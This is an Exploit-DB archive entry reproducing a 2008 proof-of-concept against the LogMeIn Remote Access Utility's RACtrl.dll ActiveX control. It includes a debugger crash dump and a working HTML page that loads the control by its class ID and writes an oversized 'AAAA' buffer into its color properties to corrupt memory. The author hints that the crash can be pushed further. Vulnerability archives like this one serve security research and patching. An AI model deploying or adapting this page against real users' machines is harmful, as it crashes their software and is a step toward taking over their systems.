LogMeIn Remote Access Utility - ActiveX Memory Corruption (Denial of Service)

EDB-ID:

6326

CVE:

2008-7053

EDB Verified:

Author:

YAG KOHHA

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2008-08-29

Vulnerable App: 
<html>
<body>
<pre>

LogMeIn Remote Access Utility ActiveX Memory Corruption 0day PoC (DoS)
Software vendor URL: http://www.logmein.com
Vulnerability at: RACtrl.dll (propset for: fgcolor, bgcolor, fmcolor)
Author: Yag Kohha (skyhole [at] gmail.com)

eax=024521b8 ebx=00000002 ecx=020e9f54 edx=00000011 esi=00000000 edi=00000000
eip=01fb537f esp=0013e160 ebp=0013e1e8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
RACtrl+0x3537f:
01fb537f 0fb706           movzx   eax,word ptr [esi]    ds:0023:00000000=????
---->>> Wanna change [esi]? Try to play with colors ;D

Greetz to:
str0ke & milw0rm
shinnai
offtopic
kais

</pre>

<object classid='clsid:FD0B6769-6490-4A91-AA0A-B5AE0DC75AC9' id='obj1'></object>
<script language='javascript'>
var buf = '';
while (buf.length < 512) buf = buf + 'AAAA';
obj1.fgcolor = buf;
obj1.bgcolor = obj1.fgcolor;
</script>
</body>
</html>

# milw0rm.com [2008-08-29]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services